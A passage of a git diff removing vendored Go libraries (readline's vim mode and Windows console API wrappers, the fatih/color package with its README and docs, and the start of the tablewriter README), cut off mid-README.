- return 
int(info.dwSize.x) -} - -// ClearScreen clears the console screen -func ClearScreen(_ io.Writer) error { - return SetConsoleCursorPosition(&_COORD{0, 0}) -} - -func DefaultIsTerminal() bool { - return true -} - -func DefaultOnWidthChanged(func()) { - -} diff --git a/vendor/github.com/chzyer/readline/vim.go b/vendor/github.com/chzyer/readline/vim.go deleted file mode 100644 index 641b22b7..00000000 --- a/vendor/github.com/chzyer/readline/vim.go +++ /dev/null @@ -1,174 +0,0 @@ -package readline - -const ( - VIM_NORMAL = iota - VIM_INSERT - VIM_VISUAL -) - -type opVim struct { - cfg *Config - op *Operation - vimMode int -} - -func newVimMode(op *Operation) *opVim { - ov := &opVim{ - cfg: op.cfg, - op: op, - } - ov.SetVimMode(ov.cfg.VimMode) - return ov -} - -func (o *opVim) SetVimMode(on bool) { - if o.cfg.VimMode && !on { // turn off - o.ExitVimMode() - } - o.cfg.VimMode = on - o.vimMode = VIM_INSERT -} - -func (o *opVim) ExitVimMode() { - o.vimMode = VIM_INSERT -} - -func (o *opVim) IsEnableVimMode() bool { - return o.cfg.VimMode -} - -func (o *opVim) handleVimNormalMovement(r rune, readNext func() rune) (t rune, handled bool) { - rb := o.op.buf - handled = true - switch r { - case 'h': - t = CharBackward - case 'j': - t = CharNext - case 'k': - t = CharPrev - case 'l': - t = CharForward - case '0', '^': - rb.MoveToLineStart() - case '$': - rb.MoveToLineEnd() - case 'x': - rb.Delete() - if rb.IsCursorInEnd() { - rb.MoveBackward() - } - case 'r': - rb.Replace(readNext()) - case 'd': - next := readNext() - switch next { - case 'd': - rb.Erase() - case 'w': - rb.DeleteWord() - case 'h': - rb.Backspace() - case 'l': - rb.Delete() - } - case 'b', 'B': - rb.MoveToPrevWord() - case 'w', 'W': - rb.MoveToNextWord() - case 'e', 'E': - rb.MoveToEndWord() - case 'f', 'F', 't', 'T': - next := readNext() - prevChar := r == 't' || r == 'T' - reverse := r == 'F' || r == 'T' - switch next { - case CharEsc: - default: - rb.MoveTo(next, prevChar, reverse) - } - default: - return r, false - } - return t, true -} - -func (o *opVim) handleVimNormalEnterInsert(r rune, readNext func() rune) (t rune, handled bool) { - rb := o.op.buf - handled = true - switch r { - case 'i': - case 'I': - rb.MoveToLineStart() - case 'a': - rb.MoveForward() - case 'A': - rb.MoveToLineEnd() - case 's': - rb.Delete() - case 'S': - rb.Erase() - case 'c': - next := readNext() - switch next { - case 'c': - rb.Erase() - case 'w': - rb.DeleteWord() - case 'h': - rb.Backspace() - case 'l': - rb.Delete() - } - default: - return r, false - } - - o.EnterVimInsertMode() - return -} - -func (o *opVim) HandleVimNormal(r rune, readNext func() rune) (t rune) { - switch r { - case CharEnter, CharInterrupt: - o.ExitVimMode() - return r - } - - if r, handled := o.handleVimNormalMovement(r, readNext); handled { - return r - } - - if r, handled := o.handleVimNormalEnterInsert(r, readNext); handled { - return r - } - - // invalid operation - o.op.t.Bell() - return 0 -} - -func (o *opVim) EnterVimInsertMode() { - o.vimMode = VIM_INSERT -} - -func (o *opVim) ExitVimInsertMode() { - o.vimMode = VIM_NORMAL -} - -func (o *opVim) HandleVim(r rune, readNext func() rune) rune { - if o.vimMode == VIM_NORMAL { - return o.HandleVimNormal(r, readNext) - } - if r == CharEsc { - o.ExitVimInsertMode() - return 0 - } - - switch o.vimMode { - case VIM_INSERT: - return r - case VIM_VISUAL: - } - return r -} diff --git a/vendor/github.com/chzyer/readline/windows_api.go b/vendor/github.com/chzyer/readline/windows_api.go deleted file mode 100644 index 63f4f7b7..00000000 --- 
a/vendor/github.com/chzyer/readline/windows_api.go +++ /dev/null @@ -1,152 +0,0 @@ -// +build windows - -package readline - -import ( - "reflect" - "syscall" - "unsafe" -) - -var ( - kernel = NewKernel() - stdout = uintptr(syscall.Stdout) - stdin = uintptr(syscall.Stdin) -) - -type Kernel struct { - SetConsoleCursorPosition, - SetConsoleTextAttribute, - FillConsoleOutputCharacterW, - FillConsoleOutputAttribute, - ReadConsoleInputW, - GetConsoleScreenBufferInfo, - GetConsoleCursorInfo, - GetStdHandle CallFunc -} - -type short int16 -type word uint16 -type dword uint32 -type wchar uint16 - -type _COORD struct { - x short - y short -} - -func (c *_COORD) ptr() uintptr { - return uintptr(*(*int32)(unsafe.Pointer(c))) -} - -const ( - EVENT_KEY = 0x0001 - EVENT_MOUSE = 0x0002 - EVENT_WINDOW_BUFFER_SIZE = 0x0004 - EVENT_MENU = 0x0008 - EVENT_FOCUS = 0x0010 -) - -type _KEY_EVENT_RECORD struct { - bKeyDown int32 - wRepeatCount word - wVirtualKeyCode word - wVirtualScanCode word - unicodeChar wchar - dwControlKeyState dword -} - -// KEY_EVENT_RECORD KeyEvent; -// MOUSE_EVENT_RECORD MouseEvent; -// WINDOW_BUFFER_SIZE_RECORD WindowBufferSizeEvent; -// MENU_EVENT_RECORD MenuEvent; -// FOCUS_EVENT_RECORD FocusEvent; -type _INPUT_RECORD struct { - EventType word - Padding uint16 - Event [16]byte -} - -type _CONSOLE_SCREEN_BUFFER_INFO struct { - dwSize _COORD - dwCursorPosition _COORD - wAttributes word - srWindow _SMALL_RECT - dwMaximumWindowSize _COORD -} - -type _SMALL_RECT struct { - left short - top short - right short - bottom short -} - -type _CONSOLE_CURSOR_INFO struct { - dwSize dword - bVisible bool -} - -type CallFunc func(u ...uintptr) error - -func NewKernel() *Kernel { - k := &Kernel{} - kernel32 := syscall.NewLazyDLL("kernel32.dll") - v := reflect.ValueOf(k).Elem() - t := v.Type() - for i := 0; i < t.NumField(); i++ { - name := t.Field(i).Name - f := kernel32.NewProc(name) - v.Field(i).Set(reflect.ValueOf(k.Wrap(f))) - } - return k -} - -func (k *Kernel) Wrap(p *syscall.LazyProc) CallFunc { - return func(args ...uintptr) error { - var r0 uintptr - var e1 syscall.Errno - size := uintptr(len(args)) - if len(args) <= 3 { - buf := make([]uintptr, 3) - copy(buf, args) - r0, _, e1 = syscall.Syscall(p.Addr(), size, - buf[0], buf[1], buf[2]) - } else { - buf := make([]uintptr, 6) - copy(buf, args) - r0, _, e1 = syscall.Syscall6(p.Addr(), size, - buf[0], buf[1], buf[2], buf[3], buf[4], buf[5], - ) - } - - if int(r0) == 0 { - if e1 != 0 { - return error(e1) - } else { - return syscall.EINVAL - } - } - return nil - } - -} - -func GetConsoleScreenBufferInfo() (*_CONSOLE_SCREEN_BUFFER_INFO, error) { - t := new(_CONSOLE_SCREEN_BUFFER_INFO) - err := kernel.GetConsoleScreenBufferInfo( - stdout, - uintptr(unsafe.Pointer(t)), - ) - return t, err -} - -func GetConsoleCursorInfo() (*_CONSOLE_CURSOR_INFO, error) { - t := new(_CONSOLE_CURSOR_INFO) - err := kernel.GetConsoleCursorInfo(stdout, uintptr(unsafe.Pointer(t))) - return t, err -} - -func SetConsoleCursorPosition(c *_COORD) error { - return kernel.SetConsoleCursorPosition(stdout, c.ptr()) -} diff --git a/vendor/github.com/fatih/color/LICENSE.md b/vendor/github.com/fatih/color/LICENSE.md deleted file mode 100644 index 25fdaf63..00000000 --- a/vendor/github.com/fatih/color/LICENSE.md +++ /dev/null @@ -1,20 +0,0 @@ -The MIT License (MIT) - -Copyright (c) 2013 Fatih Arslan - -Permission is hereby granted, free of charge, to any person obtaining a copy of -this software and associated documentation files (the "Software"), to deal in -the Software without 
restriction, including without limitation the rights to -use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of -the Software, and to permit persons to whom the Software is furnished to do so, -subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS -FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR -COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER -IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN -CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/vendor/github.com/fatih/color/README.md b/vendor/github.com/fatih/color/README.md deleted file mode 100644 index 6e39e919..00000000 --- a/vendor/github.com/fatih/color/README.md +++ /dev/null @@ -1,154 +0,0 @@ -# Color [![GoDoc](http://img.shields.io/badge/go-documentation-blue.svg?style=flat-square)](http://godoc.org/github.com/fatih/color) [![Build Status](http://img.shields.io/travis/fatih/color.svg?style=flat-square)](https://travis-ci.org/fatih/color) - - - -Color lets you use colorized outputs in terms of [ANSI Escape -Codes](http://en.wikipedia.org/wiki/ANSI_escape_code#Colors) in Go (Golang). It -has support for Windows too! The API can be used in several ways, pick one that -suits you. - - - -![Color](http://i.imgur.com/c1JI0lA.png) - - -## Install - -```bash -go get github.com/fatih/color -``` - -## Examples - -### Standard colors - -```go -// Print with default helper functions -color.Cyan("Prints text in cyan.") - -// A newline will be appended automatically -color.Blue("Prints %s in blue.", "text") - -// These are using the default foreground colors -color.Red("We have red") -color.Magenta("And many others ..") - -``` - -### Mix and reuse colors - -```go -// Create a new color object -c := color.New(color.FgCyan).Add(color.Underline) -c.Println("Prints cyan text with an underline.") - -// Or just add them to New() -d := color.New(color.FgCyan, color.Bold) -d.Printf("This prints bold cyan %s\n", "too!.") - -// Mix up foreground and background colors, create new mixes! -red := color.New(color.FgRed) - -boldRed := red.Add(color.Bold) -boldRed.Println("This will print text in bold red.") - -whiteBackground := red.Add(color.BgWhite) -whiteBackground.Println("Red text with white background.") -``` - -### Custom print functions (PrintFunc) - -```go -// Create a custom print function for convenience -red := color.New(color.FgRed).PrintfFunc() -red("Warning") -red("Error: %s", err) - -// Mix up multiple attributes -notice := color.New(color.Bold, color.FgGreen).PrintlnFunc() -notice("Don't forget this...") -``` - -### Insert into noncolor strings (SprintFunc) - -```go -// Create SprintXxx functions to mix strings with other non-colorized strings: -yellow := color.New(color.FgYellow).SprintFunc() -red := color.New(color.FgRed).SprintFunc() -fmt.Printf("This is a %s and this is %s.\n", yellow("warning"), red("error")) - -info := color.New(color.FgWhite, color.BgGreen).SprintFunc() -fmt.Printf("This %s rocks!\n", info("package")) - -// Use helper functions -fmt.Println("This", color.RedString("warning"), "should be not neglected.") -fmt.Printf("%v %v\n", color.GreenString("Info:"), "an important message.") - -// Windows supported too! 
Just don't forget to change the output to color.Output -fmt.Fprintf(color.Output, "Windows support: %s", color.GreenString("PASS")) -``` - -### Plug into existing code - -```go -// Use handy standard colors -color.Set(color.FgYellow) - -fmt.Println("Existing text will now be in yellow") -fmt.Printf("This one %s\n", "too") - -color.Unset() // Don't forget to unset - -// You can mix up parameters -color.Set(color.FgMagenta, color.Bold) -defer color.Unset() // Use it in your function - -fmt.Println("All text will now be bold magenta.") -``` - -### Disable color - -There might be a case where you want to disable color output (for example to -pipe the standard output of your app to somewhere else). `Color` has support to -disable colors both globally and for single color definition. For example -suppose you have a CLI app and a `--no-color` bool flag. You can easily disable -the color output with: - -```go - -var flagNoColor = flag.Bool("no-color", false, "Disable color output") - -if *flagNoColor { - color.NoColor = true // disables colorized output -} -``` - -It also has support for single color definitions (local). You can -disable/enable color output on the fly: - -```go -c := color.New(color.FgCyan) -c.Println("Prints cyan text") - -c.DisableColor() -c.Println("This is printed without any color") - -c.EnableColor() -c.Println("This prints again cyan...") -``` - -## Todo - -* Save/Return previous values -* Evaluate fmt.Formatter interface - - -## Credits - - * [Fatih Arslan](https://github.com/fatih) - * Windows support via @mattn: [colorable](https://github.com/mattn/go-colorable) - -## License - -The MIT License (MIT) - see [`LICENSE.md`](https://github.com/fatih/color/blob/master/LICENSE.md) for more details - diff --git a/vendor/github.com/fatih/color/color.go b/vendor/github.com/fatih/color/color.go deleted file mode 100644 index 06f4867f..00000000 --- a/vendor/github.com/fatih/color/color.go +++ /dev/null @@ -1,423 +0,0 @@ -package color - -import ( - "fmt" - "os" - "strconv" - "strings" - "sync" - - "github.com/mattn/go-colorable" - "github.com/mattn/go-isatty" -) - -// NoColor defines if the output is colorized or not. It's dynamically set to -// false or true based on the stdout's file descriptor referring to a terminal -// or not. This is a global option and affects all colors. For more control -// over each color block use the methods DisableColor() individually. -var NoColor = !isatty.IsTerminal(os.Stdout.Fd()) - -// Color defines a custom color object which is defined by SGR parameters. -type Color struct { - params []Attribute - noColor *bool -} - -// Attribute defines a single SGR Code -type Attribute int - -const escape = "\x1b" - -// Base attributes -const ( - Reset Attribute = iota - Bold - Faint - Italic - Underline - BlinkSlow - BlinkRapid - ReverseVideo - Concealed - CrossedOut -) - -// Foreground text colors -const ( - FgBlack Attribute = iota + 30 - FgRed - FgGreen - FgYellow - FgBlue - FgMagenta - FgCyan - FgWhite -) - -// Foreground Hi-Intensity text colors -const ( - FgHiBlack Attribute = iota + 90 - FgHiRed - FgHiGreen - FgHiYellow - FgHiBlue - FgHiMagenta - FgHiCyan - FgHiWhite -) - -// Background text colors -const ( - BgBlack Attribute = iota + 40 - BgRed - BgGreen - BgYellow - BgBlue - BgMagenta - BgCyan - BgWhite -) - -// Background Hi-Intensity text colors -const ( - BgHiBlack Attribute = iota + 100 - BgHiRed - BgHiGreen - BgHiYellow - BgHiBlue - BgHiMagenta - BgHiCyan - BgHiWhite -) - -// New returns a newly created color object. 
-func New(value ...Attribute) *Color { - c := &Color{params: make([]Attribute, 0)} - c.Add(value...) - return c -} - -// Set sets the given parameters immediately. It will change the color of -// output with the given SGR parameters until color.Unset() is called. -func Set(p ...Attribute) *Color { - c := New(p...) - c.Set() - return c -} - -// Unset resets all escape attributes and clears the output. Usually should -// be called after Set(). -func Unset() { - if NoColor { - return - } - - fmt.Fprintf(Output, "%s[%dm", escape, Reset) -} - -// Set sets the SGR sequence. -func (c *Color) Set() *Color { - if c.isNoColorSet() { - return c - } - - fmt.Fprintf(Output, c.format()) - return c -} - -func (c *Color) unset() { - if c.isNoColorSet() { - return - } - - Unset() -} - -// Add is used to chain SGR parameters. Use as many as parameters to combine -// and create custom color objects. Example: Add(color.FgRed, color.Underline). -func (c *Color) Add(value ...Attribute) *Color { - c.params = append(c.params, value...) - return c -} - -func (c *Color) prepend(value Attribute) { - c.params = append(c.params, 0) - copy(c.params[1:], c.params[0:]) - c.params[0] = value -} - -// Output defines the standard output of the print functions. By default -// os.Stdout is used. -var Output = colorable.NewColorableStdout() - -// Print formats using the default formats for its operands and writes to -// standard output. Spaces are added between operands when neither is a -// string. It returns the number of bytes written and any write error -// encountered. This is the standard fmt.Print() method wrapped with the given -// color. -func (c *Color) Print(a ...interface{}) (n int, err error) { - c.Set() - defer c.unset() - - return fmt.Fprint(Output, a...) -} - -// Printf formats according to a format specifier and writes to standard output. -// It returns the number of bytes written and any write error encountered. -// This is the standard fmt.Printf() method wrapped with the given color. -func (c *Color) Printf(format string, a ...interface{}) (n int, err error) { - c.Set() - defer c.unset() - - return fmt.Fprintf(Output, format, a...) -} - -// Println formats using the default formats for its operands and writes to -// standard output. Spaces are always added between operands and a newline is -// appended. It returns the number of bytes written and any write error -// encountered. This is the standard fmt.Print() method wrapped with the given -// color. -func (c *Color) Println(a ...interface{}) (n int, err error) { - c.Set() - defer c.unset() - - return fmt.Fprintln(Output, a...) -} - -// PrintFunc returns a new function that prints the passed arguments as -// colorized with color.Print(). -func (c *Color) PrintFunc() func(a ...interface{}) { - return func(a ...interface{}) { c.Print(a...) } -} - -// PrintfFunc returns a new function that prints the passed arguments as -// colorized with color.Printf(). -func (c *Color) PrintfFunc() func(format string, a ...interface{}) { - return func(format string, a ...interface{}) { c.Printf(format, a...) } -} - -// PrintlnFunc returns a new function that prints the passed arguments as -// colorized with color.Println(). -func (c *Color) PrintlnFunc() func(a ...interface{}) { - return func(a ...interface{}) { c.Println(a...) } -} - -// SprintFunc returns a new function that returns colorized strings for the -// given arguments with fmt.Sprint(). Useful to put into or mix into other -// string. 
Windows users should use this in conjuction with color.Output, example: -// -// put := New(FgYellow).SprintFunc() -// fmt.Fprintf(color.Output, "This is a %s", put("warning")) -func (c *Color) SprintFunc() func(a ...interface{}) string { - return func(a ...interface{}) string { - return c.wrap(fmt.Sprint(a...)) - } -} - -// SprintfFunc returns a new function that returns colorized strings for the -// given arguments with fmt.Sprintf(). Useful to put into or mix into other -// string. Windows users should use this in conjuction with color.Output. -func (c *Color) SprintfFunc() func(format string, a ...interface{}) string { - return func(format string, a ...interface{}) string { - return c.wrap(fmt.Sprintf(format, a...)) - } -} - -// SprintlnFunc returns a new function that returns colorized strings for the -// given arguments with fmt.Sprintln(). Useful to put into or mix into other -// string. Windows users should use this in conjuction with color.Output. -func (c *Color) SprintlnFunc() func(a ...interface{}) string { - return func(a ...interface{}) string { - return c.wrap(fmt.Sprintln(a...)) - } -} - -// sequence returns a formated SGR sequence to be plugged into a "\x1b[...m" -// an example output might be: "1;36" -> bold cyan -func (c *Color) sequence() string { - format := make([]string, len(c.params)) - for i, v := range c.params { - format[i] = strconv.Itoa(int(v)) - } - - return strings.Join(format, ";") -} - -// wrap wraps the s string with the colors attributes. The string is ready to -// be printed. -func (c *Color) wrap(s string) string { - if c.isNoColorSet() { - return s - } - - return c.format() + s + c.unformat() -} - -func (c *Color) format() string { - return fmt.Sprintf("%s[%sm", escape, c.sequence()) -} - -func (c *Color) unformat() string { - return fmt.Sprintf("%s[%dm", escape, Reset) -} - -// DisableColor disables the color output. Useful to not change any existing -// code and still being able to output. Can be used for flags like -// "--no-color". To enable back use EnableColor() method. -func (c *Color) DisableColor() { - c.noColor = boolPtr(true) -} - -// EnableColor enables the color output. Use it in conjuction with -// DisableColor(). Otherwise this method has no side effects. -func (c *Color) EnableColor() { - c.noColor = boolPtr(false) -} - -func (c *Color) isNoColorSet() bool { - // check first if we have user setted action - if c.noColor != nil { - return *c.noColor - } - - // if not return the global option, which is disabled by default - return NoColor -} - -// Equals returns a boolean value indicating whether two colors are equal. -func (c *Color) Equals(c2 *Color) bool { - if len(c.params) != len(c2.params) { - return false - } - - for _, attr := range c.params { - if !c2.attrExists(attr) { - return false - } - } - - return true -} - -func (c *Color) attrExists(a Attribute) bool { - for _, attr := range c.params { - if attr == a { - return true - } - } - - return false -} - -func boolPtr(v bool) *bool { - return &v -} - -// colorsCache is used to reduce the count of created Color objects and -// allows to reuse already created objects with required Attribute. 
-var colorsCache = make(map[Attribute]*Color) - -var colorsCacheMu = new(sync.Mutex) // protects colorsCache - -func getCachedColor(p Attribute) *Color { - colorsCacheMu.Lock() - defer colorsCacheMu.Unlock() - - c, ok := colorsCache[p] - if !ok { - c = New(p) - colorsCache[p] = c - } - - return c -} - -func colorPrint(format string, p Attribute, a ...interface{}) { - c := getCachedColor(p) - - if !strings.HasSuffix(format, "\n") { - format += "\n" - } - - if len(a) == 0 { - c.Print(format) - } else { - c.Printf(format, a...) - } -} - -func colorString(format string, p Attribute, a ...interface{}) string { - c := getCachedColor(p) - - if len(a) == 0 { - return c.SprintFunc()(format) - } - - return c.SprintfFunc()(format, a...) -} - -// Black is an convenient helper function to print with black foreground. A -// newline is appended to format by default. -func Black(format string, a ...interface{}) { colorPrint(format, FgBlack, a...) } - -// Red is an convenient helper function to print with red foreground. A -// newline is appended to format by default. -func Red(format string, a ...interface{}) { colorPrint(format, FgRed, a...) } - -// Green is an convenient helper function to print with green foreground. A -// newline is appended to format by default. -func Green(format string, a ...interface{}) { colorPrint(format, FgGreen, a...) } - -// Yellow is an convenient helper function to print with yellow foreground. -// A newline is appended to format by default. -func Yellow(format string, a ...interface{}) { colorPrint(format, FgYellow, a...) } - -// Blue is an convenient helper function to print with blue foreground. A -// newline is appended to format by default. -func Blue(format string, a ...interface{}) { colorPrint(format, FgBlue, a...) } - -// Magenta is an convenient helper function to print with magenta foreground. -// A newline is appended to format by default. -func Magenta(format string, a ...interface{}) { colorPrint(format, FgMagenta, a...) } - -// Cyan is an convenient helper function to print with cyan foreground. A -// newline is appended to format by default. -func Cyan(format string, a ...interface{}) { colorPrint(format, FgCyan, a...) } - -// White is an convenient helper function to print with white foreground. A -// newline is appended to format by default. -func White(format string, a ...interface{}) { colorPrint(format, FgWhite, a...) } - -// BlackString is an convenient helper function to return a string with black -// foreground. -func BlackString(format string, a ...interface{}) string { return colorString(format, FgBlack, a...) } - -// RedString is an convenient helper function to return a string with red -// foreground. -func RedString(format string, a ...interface{}) string { return colorString(format, FgRed, a...) } - -// GreenString is an convenient helper function to return a string with green -// foreground. -func GreenString(format string, a ...interface{}) string { return colorString(format, FgGreen, a...) } - -// YellowString is an convenient helper function to return a string with yellow -// foreground. -func YellowString(format string, a ...interface{}) string { return colorString(format, FgYellow, a...) } - -// BlueString is an convenient helper function to return a string with blue -// foreground. -func BlueString(format string, a ...interface{}) string { return colorString(format, FgBlue, a...) } - -// MagentaString is an convenient helper function to return a string with magenta -// foreground. 
-func MagentaString(format string, a ...interface{}) string { - return colorString(format, FgMagenta, a...) -} - -// CyanString is an convenient helper function to return a string with cyan -// foreground. -func CyanString(format string, a ...interface{}) string { return colorString(format, FgCyan, a...) } - -// WhiteString is an convenient helper function to return a string with white -// foreground. -func WhiteString(format string, a ...interface{}) string { return colorString(format, FgWhite, a...) } diff --git a/vendor/github.com/fatih/color/doc.go b/vendor/github.com/fatih/color/doc.go deleted file mode 100644 index 17908787..00000000 --- a/vendor/github.com/fatih/color/doc.go +++ /dev/null @@ -1,114 +0,0 @@ -/* -Package color is an ANSI color package to output colorized or SGR defined -output to the standard output. The API can be used in several way, pick one -that suits you. - -Use simple and default helper functions with predefined foreground colors: - - color.Cyan("Prints text in cyan.") - - // a newline will be appended automatically - color.Blue("Prints %s in blue.", "text") - - // More default foreground colors.. - color.Red("We have red") - color.Yellow("Yellow color too!") - color.Magenta("And many others ..") - -However there are times where custom color mixes are required. Below are some -examples to create custom color objects and use the print functions of each -separate color object. - - // Create a new color object - c := color.New(color.FgCyan).Add(color.Underline) - c.Println("Prints cyan text with an underline.") - - // Or just add them to New() - d := color.New(color.FgCyan, color.Bold) - d.Printf("This prints bold cyan %s\n", "too!.") - - - // Mix up foreground and background colors, create new mixes! - red := color.New(color.FgRed) - - boldRed := red.Add(color.Bold) - boldRed.Println("This will print text in bold red.") - - whiteBackground := red.Add(color.BgWhite) - whiteBackground.Println("Red text with White background.") - - -You can create PrintXxx functions to simplify even more: - - // Create a custom print function for convenient - red := color.New(color.FgRed).PrintfFunc() - red("warning") - red("error: %s", err) - - // Mix up multiple attributes - notice := color.New(color.Bold, color.FgGreen).PrintlnFunc() - notice("don't forget this...") - - -Or create SprintXxx functions to mix strings with other non-colorized strings: - - yellow := New(FgYellow).SprintFunc() - red := New(FgRed).SprintFunc() - - fmt.Printf("this is a %s and this is %s.\n", yellow("warning"), red("error")) - - info := New(FgWhite, BgGreen).SprintFunc() - fmt.Printf("this %s rocks!\n", info("package")) - -Windows support is enabled by default. All Print functions works as intended. -However only for color.SprintXXX functions, user should use fmt.FprintXXX and -set the output to color.Output: - - fmt.Fprintf(color.Output, "Windows support: %s", color.GreenString("PASS")) - - info := New(FgWhite, BgGreen).SprintFunc() - fmt.Fprintf(color.Output, "this %s rocks!\n", info("package")) - -Using with existing code is possible. Just use the Set() method to set the -standard output to the given parameters. That way a rewrite of an existing -code is not required. - - // Use handy standard colors. 
- color.Set(color.FgYellow) - - fmt.Println("Existing text will be now in Yellow") - fmt.Printf("This one %s\n", "too") - - color.Unset() // don't forget to unset - - // You can mix up parameters - color.Set(color.FgMagenta, color.Bold) - defer color.Unset() // use it in your function - - fmt.Println("All text will be now bold magenta.") - -There might be a case where you want to disable color output (for example to -pipe the standard output of your app to somewhere else). `Color` has support to -disable colors both globally and for single color definition. For example -suppose you have a CLI app and a `--no-color` bool flag. You can easily disable -the color output with: - - var flagNoColor = flag.Bool("no-color", false, "Disable color output") - - if *flagNoColor { - color.NoColor = true // disables colorized output - } - -It also has support for single color definitions (local). You can -disable/enable color output on the fly: - - c := color.New(color.FgCyan) - c.Println("Prints cyan text") - - c.DisableColor() - c.Println("This is printed without any color") - - c.EnableColor() - c.Println("This prints again cyan...") -*/ -package color diff --git a/vendor/github.com/olekukonko/tablewriter/LICENCE.md b/vendor/github.com/olekukonko/tablewriter/LICENCE.md deleted file mode 100644 index 1fd84842..00000000 --- a/vendor/github.com/olekukonko/tablewriter/LICENCE.md +++ /dev/null @@ -1,19 +0,0 @@ -Copyright (C) 2014 by Oleku Konko - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in -all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -THE SOFTWARE. \ No newline at end of file diff --git a/vendor/github.com/olekukonko/tablewriter/README.md b/vendor/github.com/olekukonko/tablewriter/README.md deleted file mode 100644 index 805330ad..00000000 --- a/vendor/github.com/olekukonko/tablewriter/README.md +++ /dev/null @@ -1,204 +0,0 @@ -ASCII Table Writer -========= - -[![Build Status](https://travis-ci.org/olekukonko/tablewriter.png?branch=master)](https://travis-ci.org/olekukonko/tablewriter) [![Total views](https://sourcegraph.com/api/repos/github.com/olekukonko/tablewriter/counters/views.png)](https://sourcegraph.com/github.com/olekukonko/tablewriter) - -Generate ASCII table on the fly ... 
Installation is simple as - - go get github.com/olekukonko/tablewriter - - -#### Features -- Automatic Padding -- Support Multiple Lines -- Supports Alignment -- Support Custom Separators -- Automatic Alignment of numbers & percentage -- Write directly to http , file etc via `io.Writer` -- Read directly from CSV file -- Optional row line via `SetRowLine` -- Normalise table header -- Make CSV Headers optional -- Enable or disable table border -- Set custom footer support -- Optional identical cells merging - - -#### Example 1 - Basic -```go -data := [][]string{ - []string{"A", "The Good", "500"}, - []string{"B", "The Very very Bad Man", "288"}, - []string{"C", "The Ugly", "120"}, - []string{"D", "The Gopher", "800"}, -} - -table := tablewriter.NewWriter(os.Stdout) -table.SetHeader([]string{"Name", "Sign", "Rating"}) - -for _, v := range data { - table.Append(v) -} -table.Render() // Send output -``` - -##### Output 1 -``` -+------+-----------------------+--------+ -| NAME | SIGN | RATING | -+------+-----------------------+--------+ -| A | The Good | 500 | -| B | The Very very Bad Man | 288 | -| C | The Ugly | 120 | -| D | The Gopher | 800 | -+------+-----------------------+--------+ -``` - -#### Example 2 - Without Border / Footer / Bulk Append -```go -data := [][]string{ - []string{"1/1/2014", "Domain name", "2233", "$10.98"}, - []string{"1/1/2014", "January Hosting", "2233", "$54.95"}, - []string{"1/4/2014", "February Hosting", "2233", "$51.00"}, - []string{"1/4/2014", "February Extra Bandwidth", "2233", "$30.00"}, -} - -table := tablewriter.NewWriter(os.Stdout) -table.SetHeader([]string{"Date", "Description", "CV2", "Amount"}) -table.SetFooter([]string{"", "", "Total", "$146.93"}) // Add Footer -table.SetBorder(false) // Set Border to false -table.AppendBulk(data) // Add Bulk Data -table.Render() -``` - -##### Output 2 -``` - - DATE | DESCRIPTION | CV2 | AMOUNT -+----------+--------------------------+-------+---------+ - 1/1/2014 | Domain name | 2233 | $10.98 - 1/1/2014 | January Hosting | 2233 | $54.95 - 1/4/2014 | February Hosting | 2233 | $51.00 - 1/4/2014 | February Extra Bandwidth | 2233 | $30.00 -+----------+--------------------------+-------+---------+ - TOTAL | $146 93 - +-------+---------+ - -``` - - -#### Example 3 - CSV -```go -table, _ := tablewriter.NewCSV(os.Stdout, "test_info.csv", true) -table.SetAlignment(tablewriter.ALIGN_LEFT) // Set Alignment -table.Render() -``` - -##### Output 3 -``` -+----------+--------------+------+-----+---------+----------------+ -| FIELD | TYPE | NULL | KEY | DEFAULT | EXTRA | -+----------+--------------+------+-----+---------+----------------+ -| user_id | smallint(5) | NO | PRI | NULL | auto_increment | -| username | varchar(10) | NO | | NULL | | -| password | varchar(100) | NO | | NULL | | -+----------+--------------+------+-----+---------+----------------+ -``` - -#### Example 4 - Custom Separator -```go -table, _ := tablewriter.NewCSV(os.Stdout, "test.csv", true) -table.SetRowLine(true) // Enable row line - -// Change table lines -table.SetCenterSeparator("*") -table.SetColumnSeparator("‡") -table.SetRowSeparator("-") - -table.SetAlignment(tablewriter.ALIGN_LEFT) -table.Render() -``` - -##### Output 4 -``` -*------------*-----------*---------* -╪ FIRST NAME ╪ LAST NAME ╪ SSN ╪ -*------------*-----------*---------* -╪ John ╪ Barry ╪ 123456 ╪ -*------------*-----------*---------* -╪ Kathy ╪ Smith ╪ 687987 ╪ -*------------*-----------*---------* -╪ Bob ╪ McCornick ╪ 3979870 ╪ -*------------*-----------*---------* -``` - -##### Example 5 - 
